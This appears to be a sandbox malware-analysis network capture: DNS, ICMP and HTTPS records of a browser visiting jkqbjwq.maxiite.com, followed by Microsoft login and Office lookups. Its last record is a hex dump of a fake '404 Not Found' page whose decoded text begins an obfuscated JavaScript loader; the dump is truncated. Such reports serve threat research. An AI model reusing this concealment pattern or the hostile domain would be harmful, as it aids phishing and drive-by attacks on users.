                                                                                                    Dec 23, 2024 18:43:57.740438938 CET5378553192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:57.862759113 CET53537858.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET53513848.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:57.928716898 CET5527753192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:57.928855896 CET5118353192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:58.062648058 CET53511838.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:58.063718081 CET5630853192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:58.063873053 CET5126853192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:58.191850901 CET53512688.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:58.214020967 CET53563088.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:44:03.599715948 CET5538853192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:03.599931955 CET6062453192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:06.220535040 CET5035753192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:06.220712900 CET5829153192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:06.220985889 CET5212953192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:06.221117020 CET6012253192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:07.235599995 CET53603338.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:44:09.258385897 CET4933953192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:09.258385897 CET6099453192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:20.421870947 CET5814753192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:20.422977924 CET5711353192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:25.044581890 CET53624318.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:44:30.159028053 CET53637168.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:44:39.135626078 CET6373853192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:39.135956049 CET5994453192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:39.136316061 CET5110753192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:39.136526108 CET6108453192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:43.720319033 CET6097053192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:43.721084118 CET5918153192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:45.901679039 CET5224953192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:44:45.902018070 CET6487253192.168.2.228.8.8.8
                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                    Dec 23, 2024 18:43:30.403400898 CET192.168.2.228.8.8.8d03b(Port unreachable)Destination Unreachable
                                                                                                    Dec 23, 2024 18:43:58.270708084 CET192.168.2.228.8.8.8d12a(Port unreachable)Destination Unreachable
                                                                                                    Dec 23, 2024 18:44:30.159178019 CET192.168.2.228.8.8.8d044(Port unreachable)Destination Unreachable
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Dec 23, 2024 18:43:34.422068119 CET192.168.2.228.8.8.80x58c4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:34.422216892 CET192.168.2.228.8.8.80x3dfStandard query (0)www.google.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:36.475487947 CET192.168.2.228.8.8.80x4ed3Standard query (0)jkqbjwq.maxiite.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:36.530586958 CET192.168.2.228.8.8.80xee51Standard query (0)jkqbjwq.maxiite.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:39.158781052 CET192.168.2.228.8.8.80xf486Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:39.162616014 CET192.168.2.228.8.8.80x852cStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:55.251070023 CET192.168.2.228.8.8.80xcd9fStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:55.251246929 CET192.168.2.228.8.8.80x6d6cStandard query (0)www.office.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.605345011 CET192.168.2.228.8.8.80xe35dStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.608231068 CET192.168.2.228.8.8.80x1b0cStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.739691973 CET192.168.2.228.8.8.80xebdbStandard query (0)outlook.office.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.740438938 CET192.168.2.228.8.8.80xd0b2Standard query (0)outlook.office.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.928716898 CET192.168.2.228.8.8.80xb96eStandard query (0)portal.office.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.928855896 CET192.168.2.228.8.8.80x576bStandard query (0)portal.office.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.063718081 CET192.168.2.228.8.8.80xfa2eStandard query (0)substrate.office.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.063873053 CET192.168.2.228.8.8.80xfc83Standard query (0)substrate.office.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:03.599715948 CET192.168.2.228.8.8.80xe023Standard query (0)mem.gfx.msA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:03.599931955 CET192.168.2.228.8.8.80xb968Standard query (0)mem.gfx.ms65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.220535040 CET192.168.2.228.8.8.80xbdadStandard query (0)mem.gfx.msA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.220712900 CET192.168.2.228.8.8.80x788aStandard query (0)mem.gfx.ms65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.220985889 CET192.168.2.228.8.8.80x5312Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.221117020 CET192.168.2.228.8.8.80x19edStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:09.258385897 CET192.168.2.228.8.8.80xdfe3Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:09.258385897 CET192.168.2.228.8.8.80x91acStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:20.421870947 CET192.168.2.228.8.8.80xc733Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:20.422977924 CET192.168.2.228.8.8.80x675dStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:39.135626078 CET192.168.2.228.8.8.80x9f25Standard query (0)m365cdn.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:39.135956049 CET192.168.2.228.8.8.80xf30Standard query (0)m365cdn.nel.measure.office.net65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:39.136316061 CET192.168.2.228.8.8.80xd451Standard query (0)m365cdn.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:39.136526108 CET192.168.2.228.8.8.80x11b2Standard query (0)m365cdn.nel.measure.office.net65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:43.720319033 CET192.168.2.228.8.8.80x3289Standard query (0)services.bingapis.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:43.721084118 CET192.168.2.228.8.8.80x6e6eStandard query (0)services.bingapis.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:45.901679039 CET192.168.2.228.8.8.80x3dbcStandard query (0)services.bingapis.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:45.902018070 CET192.168.2.228.8.8.80x9daeStandard query (0)services.bingapis.com65IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Dec 23, 2024 18:43:34.548161983 CET8.8.8.8192.168.2.220x3dfNo error (0)www.google.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:34.548214912 CET8.8.8.8192.168.2.220x58c4No error (0)www.google.com172.217.17.36A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:36.845819950 CET8.8.8.8192.168.2.220x4ed3No error (0)jkqbjwq.maxiite.com172.67.210.5A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:36.845819950 CET8.8.8.8192.168.2.220x4ed3No error (0)jkqbjwq.maxiite.com104.21.50.192A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:36.896605968 CET8.8.8.8192.168.2.220xee51No error (0)jkqbjwq.maxiite.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:39.281260014 CET8.8.8.8192.168.2.220xf486No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:55.385032892 CET8.8.8.8192.168.2.220xcd9fNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:55.385032892 CET8.8.8.8192.168.2.220xcd9fNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:55.385337114 CET8.8.8.8192.168.2.220x6d6cNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:55.385337114 CET8.8.8.8192.168.2.220x6d6cNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.603441954 CET8.8.8.8192.168.2.220xb04No error (0)m365cdn-sdp-public.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.603827953 CET8.8.8.8192.168.2.220xf68eNo error (0)m365cdn-sdp-public.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.603827953 CET8.8.8.8192.168.2.220xf68eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.603827953 CET8.8.8.8192.168.2.220xf68eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.755012989 CET8.8.8.8192.168.2.220x1b0cNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.757730007 CET8.8.8.8192.168.2.220xe35dNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.862759113 CET8.8.8.8192.168.2.220xd0b2No error (0)outlook.office.comsubstrate.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.862759113 CET8.8.8.8192.168.2.220xd0b2No error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.862759113 CET8.8.8.8192.168.2.220xd0b2No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)outlook.office.comsubstrate.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)ooc-g2.tm-4.office.com52.98.32.2A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)ooc-g2.tm-4.office.com52.98.95.210A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)ooc-g2.tm-4.office.com40.99.70.226A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)ooc-g2.tm-4.office.com52.98.61.34A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)ooc-g2.tm-4.office.com40.99.60.2A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)ooc-g2.tm-4.office.com40.99.70.210A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)ooc-g2.tm-4.office.com40.99.68.34A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:57.888891935 CET8.8.8.8192.168.2.220xebdbNo error (0)ooc-g2.tm-4.office.com40.99.32.114A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.051052094 CET8.8.8.8192.168.2.220xb96eNo error (0)portal.office.comadmin-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.051052094 CET8.8.8.8192.168.2.220xb96eNo error (0)admin-portal.office.comportal-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.062648058 CET8.8.8.8192.168.2.220x576bNo error (0)portal.office.comadmin-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.062648058 CET8.8.8.8192.168.2.220x576bNo error (0)admin-portal.office.comportal-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.191850901 CET8.8.8.8192.168.2.220xfc83No error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.191850901 CET8.8.8.8192.168.2.220xfc83No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.214020967 CET8.8.8.8192.168.2.220xfa2eNo error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.214020967 CET8.8.8.8192.168.2.220xfa2eNo error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.214020967 CET8.8.8.8192.168.2.220xfa2eNo error (0)ooc-g2.tm-4.office.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.214020967 CET8.8.8.8192.168.2.220xfa2eNo error (0)outlook.ms-acdc.office.comDOH-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.214020967 CET8.8.8.8192.168.2.220xfa2eNo error (0)DOH-efz.ms-acdc.office.com40.99.27.2A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.214020967 CET8.8.8.8192.168.2.220xfa2eNo error (0)DOH-efz.ms-acdc.office.com40.99.26.210A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.214020967 CET8.8.8.8192.168.2.220xfa2eNo error (0)DOH-efz.ms-acdc.office.com40.99.27.18A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:43:58.214020967 CET8.8.8.8192.168.2.220xfa2eNo error (0)DOH-efz.ms-acdc.office.com40.99.26.178A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:03.744695902 CET8.8.8.8192.168.2.220xb968No error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:03.744695902 CET8.8.8.8192.168.2.220xb968No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:03.745464087 CET8.8.8.8192.168.2.220xe023No error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:03.745464087 CET8.8.8.8192.168.2.220xe023No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:03.745464087 CET8.8.8.8192.168.2.220xe023No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.364516973 CET8.8.8.8192.168.2.220xbdadNo error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.364516973 CET8.8.8.8192.168.2.220xbdadNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.364516973 CET8.8.8.8192.168.2.220xbdadNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.365005970 CET8.8.8.8192.168.2.220x5312No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.365005970 CET8.8.8.8192.168.2.220x5312No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.365005970 CET8.8.8.8192.168.2.220x5312No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.365005970 CET8.8.8.8192.168.2.220x5312No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.371987104 CET8.8.8.8192.168.2.220x19edNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.371987104 CET8.8.8.8192.168.2.220x19edNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.372482061 CET8.8.8.8192.168.2.220x788aNo error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:06.372482061 CET8.8.8.8192.168.2.220x788aNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:09.392329931 CET8.8.8.8192.168.2.220xdfe3No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:09.392329931 CET8.8.8.8192.168.2.220xdfe3No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:09.392329931 CET8.8.8.8192.168.2.220xdfe3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:09.392329931 CET8.8.8.8192.168.2.220xdfe3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:09.407337904 CET8.8.8.8192.168.2.220x91acNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:09.407337904 CET8.8.8.8192.168.2.220x91acNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:20.557043076 CET8.8.8.8192.168.2.220xc733No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:20.569856882 CET8.8.8.8192.168.2.220x675dNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:23.468489885 CET8.8.8.8192.168.2.220x61b7No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:23.468594074 CET8.8.8.8192.168.2.220x3918No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:23.468594074 CET8.8.8.8192.168.2.220x3918No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:26.127827883 CET8.8.8.8192.168.2.220x6b61No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:26.133826971 CET8.8.8.8192.168.2.220x9cc9No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:26.133826971 CET8.8.8.8192.168.2.220x9cc9No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:34.734930992 CET8.8.8.8192.168.2.220x6738No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:34.734930992 CET8.8.8.8192.168.2.220x6738No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:34.735225916 CET8.8.8.8192.168.2.220x3046No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:39.261461020 CET8.8.8.8192.168.2.220xf30No error (0)m365cdn.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:39.262032986 CET8.8.8.8192.168.2.220x11b2No error (0)m365cdn.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:39.285116911 CET8.8.8.8192.168.2.220x9f25No error (0)m365cdn.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:39.286416054 CET8.8.8.8192.168.2.220xd451No error (0)m365cdn.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:43.845820904 CET8.8.8.8192.168.2.220x3289No error (0)services.bingapis.comservices-bingapis-com.e-0001.e-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:43.863408089 CET8.8.8.8192.168.2.220x6e6eNo error (0)services.bingapis.comservices-bingapis-com.e-0001.e-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:46.029870987 CET8.8.8.8192.168.2.220x3dbcNo error (0)services.bingapis.comservices-bingapis-com.e-0001.e-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 18:44:46.035907030 CET8.8.8.8192.168.2.220x9daeNo error (0)services.bingapis.comservices-bingapis-com.e-0001.e-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    • jkqbjwq.maxiite.com
                                                                                                    • a.nel.cloudflare.com
                                                                                                    • https:
                                                                                                      • mem.gfx.ms
                                                                                                      • js.monitor.azure.com
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.2249167172.67.210.5443300C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 17:43:38 UTC663OUTGET / HTTP/1.1
                                                                                                    Host: jkqbjwq.maxiite.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 17:43:39 UTC805INHTTP/1.1 404
                                                                                                    Date: Mon, 23 Dec 2024 17:43:38 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Referrer-Policy: no-referrer
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUaZ%2FHZfFyQVvb3r%2Fd0zCUCc6VTBRokIpiY89p5q3jNwkzgygg7taaKsBub10Zqq0GrUihLAcZQhlkJhISGUeC%2Fj24RxHJQh%2Bw5SF7OXoEo3ZWmiXG1s8NMu9GWMK34BL1OHlhop"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a27b2ef9b8cbf-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1778&rtt_var=688&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1241&delivery_rate=1564844&cwnd=249&unsent_bytes=0&cid=0d5a87c50b83ed73&ts=694&x=0"
                                                                                                    2024-12-23 17:43:39 UTC564INData Raw: 35 37 38 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 2d 72 65 66 65 72 72 65 72 27 3e 3c 73 63 72 69 70 74 3e 20 69 66 20 28 77 69 6e 64 6f 77 2e 73 65 6c 66 21 3d 27 67 6f 6f 67 6c 65 2e 63 6f 6d 27 29 20 7b 76 61 72 20 5f 30 78 63 31 36 65 3d 5b 22 22 2c 22 73 70 6c 69 74 22 2c 22 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 2b 2f 22 2c 22 73 6c 69 63 65 22 2c 22 69 6e 64 65 78 4f 66 22 2c 22 22 2c 22 22 2c 22 2e 22 2c 22 70 6f 77 22 2c
